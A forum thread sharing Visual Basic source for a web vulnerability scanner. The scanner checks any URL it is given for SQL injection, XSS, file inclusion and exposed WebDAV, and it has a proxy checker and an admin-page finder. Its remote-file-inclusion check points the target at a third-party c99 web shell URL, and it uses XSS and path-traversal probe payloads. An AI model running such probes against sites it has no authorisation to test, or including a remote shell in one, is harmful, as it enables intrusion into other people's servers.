
View Full Version : Web Vulnerability Scanner Source Code



[SSH]Anubi
04-03-2013, 08:03 AM
YOU NEED VISUAL BASIC!


Imports System.Net

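''' <summary>
''' Main window. Takes a host (TextBox1) and a path/query (TextBox2), runs the five
''' checks of this listing on a worker thread and shows one red/green label per check.
''' </summary>
Public Class Form1
    ' Delegates used to hand UI updates from the scan thread back to the UI thread.
    Private Delegate Sub ProgressUpdate(ByVal value As Integer)
    Private Delegate Sub ButtonTextUpdate(ByVal caption As String)
    Private Delegate Sub ResultUpdate(ByVal target As Control, ByVal checkName As String, ByVal isVulnerable As Boolean)
    Private Delegate Sub MessageUpdate(ByVal text As String, ByVal titoloa As String)

    ' Proxy address chosen in the proxy-checker window; the scanner classes read it.
    Public Proxystr As String
    ' Decimal literal suffix so the value is not routed through Double first.
    Public versione As Decimal = 0.01D
    Public sub_version As String = "Alpha Release"
    ' Text and title handed to the custom message window (see Showmsg).
    Public messaggio As String
    Public titolo As String

    ' Snapshot of the text boxes taken on the UI thread when a scan starts,
    ' so the worker thread never has to read a control.
    Private scanHost As String
    Private scanUrl As String
    ' True while a scan thread is alive; blocks a second click from starting an overlapping scan.
    Private scanRunning As Boolean

    Private Sub Cross_Threading() Handles Me.Load
        ' NOTE(review): this switches off a process-wide WinForms safety check. It is kept
        ' because Admin_Page_Finder and Proxy_Checher in this listing update their controls
        ' from worker threads; the scan below no longer depends on it.
        Control.CheckForIllegalCrossThreadCalls = False

    End Sub

    ''' <summary>Starts a scan if the target answers and no scan is already running.</summary>
    Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
        If scanRunning Then
            Return
        End If

        scanHost = TextBox1.Text
        scanUrl = scanHost & TextBox2.Text

        If Not Site_Info.siteUp(scanUrl) Then
            Showmsg("Web site doesn't exist", "Warning")
            Return
        End If

        scanRunning = True
        Dim worker As New System.Threading.Thread(AddressOf Scan_Vln)
        ' Background thread: closing the window must not leave the process alive
        ' while a request is still waiting for a response.
        worker.IsBackground = True
        worker.Start()
    End Sub

    ''' <summary>
    ''' Worker-thread body: runs the SQL injection, RFI, LFI, XSS and WebDAV checks in that
    ''' order and reports each result. Every control update goes through Invoke.
    ''' </summary>
    Private Sub Scan_Vln()
        Try
            OnUi(New ButtonTextUpdate(AddressOf ShowButtonText), "Attendere...")
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 0)

            OnUi(New ResultUpdate(AddressOf ShowResult), Label2, "Sql Injection", SQL_Injection_Scanner.vulnerabile(scanUrl))
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 2)

            ' NOTE(review): the second argument is a script hosted by a third party. A target
            ' that really is vulnerable fetches and evaluates whatever that host serves at
            ' scan time. Rfi_Scanner only looks for the marker "RFI_SUCCESSFUL", so this
            ' should reference inert content under the tester's control instead.
            OnUi(New ResultUpdate(AddressOf ShowResult), Label3, "Rfi", Rfi_Scanner.Vulnerabile(scanUrl, "http://www.sh3ll.org/c99.txt"))
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 4)

            OnUi(New ResultUpdate(AddressOf ShowResult), Label4, "Lfi", Lfi_Scanner.Vulnerabile(scanUrl))
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 6)

            OnUi(New ResultUpdate(AddressOf ShowResult), Label5, "Xss", Xss_Scanner.Vulnerabile(scanUrl))
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 8)

            ' The WebDAV check receives the host field only, not the full URL.
            OnUi(New ResultUpdate(AddressOf ShowResult), Label6, "WebDav", WebDav_Scanner.Vulnerabile(scanHost))
            OnUi(New ProgressUpdate(AddressOf ShowProgress), 10)
        Catch ex As Exception
            ' An exception escaping a worker thread would terminate the whole process,
            ' so report it in the message window instead.
            OnUi(New MessageUpdate(AddressOf Showmsg), ex.Message, "Errore")
        Finally
            scanRunning = False
            OnUi(New ButtonTextUpdate(AddressOf ShowButtonText), "Scan")
        End Try
    End Sub

    ' Runs the delegate on the UI thread; does nothing once the window is gone.
    Private Sub OnUi(ByVal target As [Delegate], ByVal ParamArray args() As Object)
        If Me.IsDisposed OrElse Not Me.IsHandleCreated Then
            Return
        End If
        Me.Invoke(target, args)
    End Sub

    ' Moves the progress bar; the scale is fixed at 10 (two steps per check).
    Private Sub ShowProgress(ByVal value As Integer)
        DroneProgressBar1.Maximum = 10
        DroneProgressBar1.Value = value
    End Sub

    ' Sets the caption of the scan button.
    Private Sub ShowButtonText(ByVal caption As String)
        Thief3Button1.Text = caption
    End Sub

    ' Writes "<check> - Vulnerabile" in red or "<check> - Non Vulnerabile" in green.
    Private Sub ShowResult(ByVal target As Control, ByVal checkName As String, ByVal isVulnerable As Boolean)
        If isVulnerable Then
            target.Text = checkName & " - Vulnerabile"
            target.ForeColor = Color.Red
        Else
            target.Text = checkName & " - Non Vulnerabile"
            target.ForeColor = Color.Green
        End If
    End Sub

    Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click
        Admin_Page_Finder.Show()
    End Sub

    ' Appends the release name to the title and removes the native window border.
    Private Sub Rimuovi_Finestra() Handles Me.Load
        Thief3Theme1.Text = Thief3Theme1.Text & " - " & sub_version
        Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
    End Sub

    Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
        Proxy_Checher.Show()
    End Sub

    Private Sub Thief3Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button4.Click
        About.Show()
    End Sub

    ''' <summary>Custom message box: stores text and title, then opens the msg window, which reads them.</summary>
    ''' <param name="text">Message body.</param>
    ''' <param name="titoloa">Window title.</param>
    Public Sub Showmsg(ByVal text As String, ByVal titoloa As String)
        messaggio = text
        titolo = titoloa
        msg.Show()
    End Sub

    Private Sub DroneButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton2.Click
        Me.Close()
    End Sub

End Class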

''' <summary>Small factory shared by the scanner classes to turn a proxy address into a WebProxy.</summary>
Public Class Proxy

    ''' <summary>Builds a proxy object for the given address.</summary>
    ''' <param name="url">Proxy address, passed unchanged to the WebProxy constructor.</param>
    ''' <returns>A new WebProxy for <paramref name="url"/>.</returns>
    Shared Function Get_Proxy(ByVal url As String) As System.Net.WebProxy
        Dim configured As System.Net.WebProxy = New System.Net.WebProxy(url)
        Return configured
    End Function

End Class
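''' <summary>Error-message based check for SQL injection on a URL with query parameters.</summary>
Public Class SQL_Injection_Scanner

    ''' <summary>
    ''' Requests <paramref name="link"/> with a single quote inserted after every "=" and
    ''' looks for three fixed strings in the response body.
    ''' </summary>
    ''' <param name="link">URL to test; one without "=" is reported as not vulnerable without any request.</param>
    ''' <returns>True when one of the strings is found; False otherwise, including on any request error.</returns>
    Shared Function vulnerabile(ByVal link As String) As Boolean
        If link Is Nothing OrElse Not link.Contains("=") Then
            Return False
        End If

        Try
            ' Using releases the WebClient even when the download throws.
            Using client As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    client.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If

                Dim body As String = client.DownloadString(link.Replace("=", "='"))

                ' NOTE(review): "Warning" and "Fatal error" are generic strings, so an
                ' unrelated page containing either word is reported as vulnerable too.
                Return body.Contains("You have an error in your SQL syntax") _
                    OrElse body.Contains("Fatal error") _
                    OrElse body.Contains("Warning")
            End Using
        Catch ex As Exception
            ' DownloadString throws on HTTP error statuses as well, so a server that answers
            ' the probe with an error page lands here and is reported as not vulnerable.
            ' The original had a Showmsg call after this Return; it could never run and
            ' has been dropped.
            Return False
        End Try
    End Function

End Class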
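''' <summary>Reflection check for cross-site scripting on the first parameter of a URL.</summary>
Public Class Xss_Scanner

    ''' <summary>
    ''' Replaces the value of the first "=" parameter with a fixed script marker, requests
    ''' the result and reports whether the marker comes back unescaped in the body.
    ''' </summary>
    ''' <param name="link">URL to test. Only its first line is used: the original loop
    ''' returned during its first pass in every case, and that behaviour is kept.</param>
    ''' <returns>True when the marker is reflected and the body holds no MySQL syntax error;
    ''' False otherwise, including on any request error.</returns>
    Shared Function Vulnerabile(ByVal link As String) As Boolean
        Const Marker As String = "<script>alert('XSS_SUCCESSFUL')</script>"

        ' Without this Try a failed download raised on the scan thread, and an unhandled
        ' exception on a worker thread terminates the process.
        Try
            Using client As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    client.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If

                ' Everything before the first "=" is kept; the value is replaced by the probe.
                Dim prefix As String = link.Split(vbNewLine)(0).Trim.Split("=")(0)
                Dim body As String = client.DownloadString(prefix & "=" & Chr(34) & ">" & Marker)

                ' A SQL error page that echoes the query is not counted as reflection.
                Return body.Contains(Marker) AndAlso Not body.Contains("You have an error in your SQL syntax")
            End Using
        Catch ex As Exception
            Return False
        End Try
    End Function

End Class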
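''' <summary>Looks for a default WebDAV test page under /webdav/ on a host.</summary>
Public Class WebDav_Scanner

    ''' <summary>
    ''' Requests "/webdav/" on the given host with a five second timeout and checks the body
    ''' for the text "WebDAV testpage".
    ''' </summary>
    ''' <param name="link">Host, with or without a scheme. Form1 passes the same text box
    ''' value that prefixes the URL given to Site_Info.siteUp, so it may already carry
    ''' "http://"; the scheme is only added when it is missing.</param>
    ''' <returns>True when the test page text is found; False otherwise, including on any request error.</returns>
    Shared Function Vulnerabile(ByVal link As String) As Boolean

        Try
            Dim baseUrl As String = link
            If Not baseUrl.Contains("://") Then
                baseUrl = "http://" & baseUrl
            End If
            Dim endpoint As String = baseUrl.TrimEnd("/"c) & "/webdav/"

            Dim request As System.Net.HttpWebRequest = DirectCast(System.Net.WebRequest.Create(endpoint), System.Net.HttpWebRequest)
            ' The original configured the proxy on a WebClient it never used, so this check
            ' ignored the proxy setting that the other checks honour.
            If Form1.Proxystr <> Nothing Then
                request.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
            End If
            request.Timeout = 5000

            ' Response and reader are released on every path.
            Using response As System.Net.HttpWebResponse = DirectCast(request.GetResponse(), System.Net.HttpWebResponse)
                Using reader As New System.IO.StreamReader(response.GetResponseStream())
                    Return reader.ReadToEnd().Contains("WebDAV testpage")
                End Using
            End Using
        Catch ex As Exception
            Return False
        End Try

    End Function

End Class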
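''' <summary>Error-message based check for local file inclusion on the first parameter of a URL.</summary>
Public Class Lfi_Scanner

    ''' <summary>
    ''' Replaces the value of the first "=" parameter with "../", requests the result and
    ''' looks for the text "No such file or directory" in the body.
    ''' </summary>
    ''' <param name="link">URL to test. Only its first line is used: the original loop
    ''' returned during its first pass, because the probe it builds always contains "=".</param>
    ''' <returns>True when the error text is found; False otherwise, including on any request error.</returns>
    Shared Function Vulnerabile(ByVal link As String) As Boolean
        Try
            Using client As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    client.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If

                Dim probe As String = link.Split(vbNewLine)(0).Trim.Split("=")(0) & "=../"
                Dim body As String = client.DownloadString(probe)

                Return body.Contains("No such file or directory")
            End Using
        Catch ex As Exception
            ' The original left this handler empty and fell off the end of the function;
            ' the result was the same implicit False, now stated explicitly.
            Return False
        End Try
    End Function

End Class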

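''' <summary>Marker based check for remote file inclusion on the first parameter of a URL.</summary>
Public Class Rfi_Scanner

    ''' <summary>
    ''' Replaces the value of the first "=" parameter with <paramref name="SHELL_URL"/>
    ''' followed by "?", requests the result and looks for the marker "RFI_SUCCESSFUL".
    ''' </summary>
    ''' <param name="link">URL to test. Only its first line is used: the original loop
    ''' returned during its first pass, because the probe it builds always contains "=".</param>
    ''' <param name="SHELL_URL">Address of the remote content the target is asked to include.
    ''' NOTE(review): a target that really is vulnerable fetches and evaluates this content,
    ''' so it should be an inert file under the tester's control that only emits the marker,
    ''' never a third-party script.</param>
    ''' <returns>True when the marker is present, "$invulnerable" is absent and the body is
    ''' longer than 20 characters; False otherwise, including on any request error.</returns>
    Shared Function Vulnerabile(ByVal link As String, ByVal SHELL_URL As String) As Boolean
        Try
            Using client As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    client.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If

                Dim probe As String = link.Split(vbNewLine)(0).Trim.Split("=")(0) & "=" & SHELL_URL & "?"
                Dim body As String = client.DownloadString(probe)

                Return body.Contains("RFI_SUCCESSFUL") _
                    AndAlso Not body.Contains("$invulnerable") _
                    AndAlso body.Length > 20
            End Using
        Catch ex As Exception
            ' NOTE(review): this runs on the scan thread; confirm that opening the message
            ' window from a non-UI thread behaves as intended.
            Form1.Showmsg(ex.Message, "Errore")
            Return False
        End Try
    End Function

End Class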

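''' <summary>Reachability helper used before a scan and by the admin page finder.</summary>
Public Class Site_Info

    ''' <summary>Sends a HEAD request and reports whether the final status is 200 OK.</summary>
    ''' <param name="url">Absolute http or https URL.</param>
    ''' <returns>True only for status 200; False for any other status, a malformed or
    ''' non-HTTP URL, an empty value, or a network error.</returns>
    Shared Function siteUp(ByVal url As String) As Boolean
        If String.IsNullOrEmpty(url) Then
            Return False
        End If

        Try
            Dim request As HttpWebRequest = DirectCast(WebRequest.Create(url), HttpWebRequest)

            ' The original attached CredentialCache.DefaultCredentials here. That offers the
            ' logged-on Windows account to whatever server the URL names whenever it asks for
            ' integrated authentication, which a probe of an arbitrary site must not do.
            ' No credentials are sent.

            ' HEAD rather than GET: GET works as well but is slower.
            request.Method = "HEAD"

            Using response As HttpWebResponse = DirectCast(request.GetResponse(), HttpWebResponse)
                Return response.StatusCode = HttpStatusCode.OK
            End Using
        Catch ex As Exception
            Return False
        End Try
    End Function

End Class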
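''' <summary>Connectivity test for a proxy address.</summary>
Public Class Proxy_Checker

    ''' <summary>Tries to open <paramref name="Test_Site"/> through the given proxy.</summary>
    ''' <param name="proxy">Proxy address handed to the WebProxy constructor.</param>
    ''' <param name="Test_Site">URL fetched through the proxy.</param>
    ''' <returns>True when the request could be opened; False on any error. The response
    ''' content is not inspected, so a proxy that answers with its own page also counts.</returns>
    Shared Function Proxy_Ok(ByVal proxy As String, Optional ByVal Test_Site As String = "http://www.google.com") As Boolean
        Try
            Using client As New System.Net.WebClient
                client.Proxy = New System.Net.WebProxy(proxy)

                ' The original never closed the stream returned by OpenRead, which kept the
                ' connection open after every check.
                Using reply As System.IO.Stream = client.OpenRead(Test_Site)
                    Return True
                End Using
            End Using
        Catch
            Return False
        End Try
    End Function

End Class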






Imports System.Net
Imports System.IO
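''' <summary>
''' Window that downloads a list of candidate paths, appends each one to a base URL and
''' lists those that Site_Info.siteUp reports as reachable.
''' </summary>
Public Class Admin_Page_Finder
    ' NOTE(review): the list is fetched over plain HTTP from a third-party host with no
    ' integrity check. Its lines become request URLs and, through the result list, input
    ' to Process.Start, so they have to be treated as untrusted.
    Private Const WordlistUrl As String = "http://server4project.altervista.org/Programmi/Web%20Vulnerability%20Scanner/Admin.txt"
    Private Const WordlistFile As String = "Admin.txt"
    Private Const NoResultText As String = "Nessun Risultato"

    ' Index of the last list entry (count - 1); shown in the progress label.
    Dim Pagine_ToT As Integer
    ' Number of entries checked so far in the current run.
    Dim Pagine_Controllate As Integer
    ' Off-screen list that only holds the downloaded paths.
    Dim Dork_Lst As New ListBox
    ' Running scan thread, kept so that the Stop button can end it.
    Dim th As Threading.Thread

    ''' <summary>Copies the target from Form1, then downloads and loads the path list.</summary>
    Private Sub Scarica_Dork()
        TextBox2.Text = Form1.TextBox1.Text
        Pagine_ToT = -1

        Try
            ' DownloadFile refuses to overwrite, so an old copy is removed first.
            If IO.File.Exists(WordlistFile) Then
                IO.File.Delete(WordlistFile)
            End If
            My.Computer.Network.DownloadFile(WordlistUrl, WordlistFile) ' file holding the admin page paths

            For Each entry As String In IO.File.ReadAllLines(WordlistFile)
                Dork_Lst.Items.Add(entry)
                Pagine_ToT += 1
            Next
        Catch ex As Exception
            ' The original let a failed download escape from the Load handler, and its
            ' Finally block called Close on a reader that was still Nothing when the open
            ' had failed. Both cases now end here with an empty list.
            Form1.Showmsg(ex.Message, "Errore")
        End Try
    End Sub

    ''' <summary>Checks every loaded path against the base URL in TextBox2 and lists the hits.</summary>
    Sub Scan_For_Page()
        ' The counter below reaches the number of entries, one more than Pagine_ToT,
        ' so the bar is scaled to the count.
        DroneProgressBar1.Maximum = Dork_Lst.Items.Count
        DroneProgressBar1.Value = 0
        Pagine_Controllate = 0
        ListBox2.Items.Clear()

        For i = 0 To Dork_Lst.Items.Count - 1
            Dim entry As String = Dork_Lst.Items(i).ToString()
            Dim sito As String = TextBox2.Text & entry

            If Site_Info.siteUp(sito) Then
                ListBox2.Items.Add(sito)
            End If

            Pagine_Controllate += 1
            Label1.Text = i & " / " & Pagine_ToT & " | " & entry
            DroneProgressBar1.Value = Pagine_Controllate
            Application.DoEvents()
        Next

        If ListBox2.Items.Count = 0 Then
            ListBox2.Items.Add(NoResultText)
        End If
        Thief3Button2.Text = "Scan"
    End Sub

    ''' <summary>Toggles between starting a scan thread and stopping the running one.</summary>
    Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click

        If Thief3Button2.Text = "Scan" Then
            Dim worker As New Threading.Thread(AddressOf Scan)
            ' Background thread: closing the window must not keep the process alive.
            worker.IsBackground = True
            worker.Start()
            th = worker
            Thief3Button2.Text = "Stop"
        Else
            ' NOTE(review): Thread.Abort can interrupt a request at any point; a flag
            ' checked once per loop pass would be the cleaner way to stop.
            If th IsNot Nothing Then
                th.Abort()
            End If
            Thief3Button2.Text = "Scan"
        End If

    End Sub

    ' Thread body: the base URL must end with "/" because paths are appended directly.
    Private Sub Scan()

        If TextBox2.Text.EndsWith("/") Then
            Scan_For_Page()
        Else
            Form1.Showmsg("Url invalido", "Attenzione")
        End If
    End Sub

    Private Sub loadd() Handles Me.Load
        ' NOTE(review): process-wide switch; needed because Scan_For_Page updates
        ' controls from the scan thread.
        Control.CheckForIllegalCrossThreadCalls = False
        Scarica_Dork()
    End Sub

    ''' <summary>Opens the selected result in the default browser.</summary>
    Private Sub ListBox2_DoubleClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ListBox2.DoubleClick
        Dim chosen As String = TryCast(ListBox2.SelectedItem, String)
        If String.IsNullOrEmpty(chosen) OrElse chosen = NoResultText Then
            Return
        End If

        ' Process.Start hands the string to the shell, which would just as readily open a
        ' local file or program. The entry is built from a downloaded list, so only
        ' absolute http/https addresses are passed on.
        Dim destination As Uri = Nothing
        If Uri.TryCreate(chosen, UriKind.Absolute, destination) _
            AndAlso (destination.Scheme = Uri.UriSchemeHttp OrElse destination.Scheme = Uri.UriSchemeHttps) Then
            Process.Start(destination.AbsoluteUri)
        End If
    End Sub

    ' No Handles clause in the listing, so nothing visible here wires this to a control.
    Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)
        If Site_Info.siteUp(TextBox2.Text) Then
            TextBox2.ForeColor = Color.Green
        Else
            TextBox2.ForeColor = Color.Red
        End If
    End Sub

    Private Sub Rimuovi_Finestra() Handles Me.Load
        Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
    End Sub

    Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
        Me.Close()
    End Sub

    Private Sub ico() Handles Me.Load
        Me.Icon = Form1.Icon
    End Sub
End Class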








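''' <summary>Custom message window; shows the text and title stored on Form1 by Showmsg.</summary>
Public Class msg

    Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
        Me.Close()
    End Sub

    ' Copies message and title from Form1, keeps the window on top and fits its width.
    Private Sub hs() Handles Me.Load
        Label1.Text = Form1.messaggio
        DroneTheme1.Text = Form1.titolo
        Me.TopMost = True
        resizec()
    End Sub

    ''' <summary>Widens the window in 10 pixel steps until the label no longer overlaps the separator.</summary>
    Private Sub resizec() Handles Me.HandleCreated
        ' The original loop had no exit other than the overlap clearing, so a layout where
        ' widening never separates the two controls would hang the window. It now also
        ' stops at the screen width or when a resize has no effect.
        Dim widthLimit As Integer = Screen.PrimaryScreen.WorkingArea.Width

        While Label1.Bounds.IntersectsWith(DroneSeperator1.Bounds) AndAlso Me.Size.Width < widthLimit
            Dim before As Integer = Me.Size.Width
            Me.Size = New Size(before + 10, Me.Size.Height)
            If Me.Size.Width = before Then
                Exit While
            End If
        End While

    End Sub

End Class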






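''' <summary>
''' Window that tests a proxy address on a worker thread, shows the round-trip time and
''' lets the user store the address in Form1.Proxystr.
''' </summary>
Public Class Proxy_Checher
    ' Hands the result from the worker thread back to the UI thread.
    Private Delegate Sub ResultUpdate(ByVal text As String, ByVal tint As Color)

    ' Address captured on the UI thread when a check starts.
    Private proxyUnderTest As String
    ' Running check thread, kept so that the Stop button can end it.
    Dim t As Threading.Thread

    Private Sub Carica() Handles Me.Load
        ' NOTE(review): process-wide switch that disables a WinForms safety check; the
        ' check below no longer depends on it.
        Control.CheckForIllegalCrossThreadCalls = False
    End Sub

    ''' <summary>Toggles between starting a check and stopping the running one.</summary>
    Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
        If Thief3Button1.Text = "Check" Then
            Label2.Text = "Attendere..."
            Thief3Button1.Text = "Stop"
            proxyUnderTest = TextBox1.Text

            Dim worker As New System.Threading.Thread(AddressOf Check)
            ' Background thread: closing the window must not keep the process alive
            ' while the test request is still waiting.
            worker.IsBackground = True
            t = worker
            worker.Start()
        Else
            ' NOTE(review): Thread.Abort can interrupt the request at any point.
            If t IsNot Nothing Then
                t.Abort()
            End If
            Label2.Text = "Processo Interrotto"
            Thief3Button1.Text = "Check"
        End If

    End Sub

    ''' <summary>Thread body: times Proxy_Checker.Proxy_Ok for the captured address and reports the outcome.</summary>
    Sub Check()
        Dim candidate As String = proxyUnderTest
        If candidate Is Nothing Then
            ' Called without going through the button: fall back to the text box.
            candidate = TextBox1.Text
        End If

        Dim timer As New Stopwatch
        timer.Start()
        Dim working As Boolean = Proxy_Checker.Proxy_Ok(candidate)
        timer.Stop()

        If working Then
            Report(candidate & " - Funzionante - " & timer.ElapsedMilliseconds & " ms", Color.Green)
        Else
            Report(candidate & " - Non Funzionante", Color.Red)
        End If
    End Sub

    ' Runs ShowResult on the UI thread; does nothing once the window is gone.
    Private Sub Report(ByVal text As String, ByVal tint As Color)
        If Me.IsDisposed OrElse Not Me.IsHandleCreated Then
            Return
        End If
        Me.Invoke(New ResultUpdate(AddressOf ShowResult), text, tint)
    End Sub

    ' Shows the outcome and re-arms the button.
    Private Sub ShowResult(ByVal text As String, ByVal tint As Color)
        Label2.Text = text
        Label2.ForeColor = tint
        Thief3Button1.Text = "Check"
    End Sub

    ' Stores the address for the scanner classes, whether or not it was tested.
    Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
        Form1.Proxystr = TextBox1.Text
    End Sub

    Private Sub Rimuovi_Finestra() Handles Me.Load
        Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
    End Sub

    Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
        Me.Close()
    End Sub

    Private Sub ico() Handles Me.Load
        Me.Icon = Form1.Icon
    End Sub

    ' Empty handler left in place; the listing attaches it to the theme control's Click event.
    Private Sub Thief3Theme1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Theme1.Click

    End Sub
End Class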

BruceWayne
04-03-2013, 09:11 AM
So what is this exactly for? And what is the source?

GetParanoid
04-03-2013, 05:40 PM
What all buttons do we need to add to get this working?

Dr41DeY
09-05-2013, 12:46 PM
Thanks for posting! :)
The coding looks good.

But, what do we need to add?

You're only giving us the source code! :$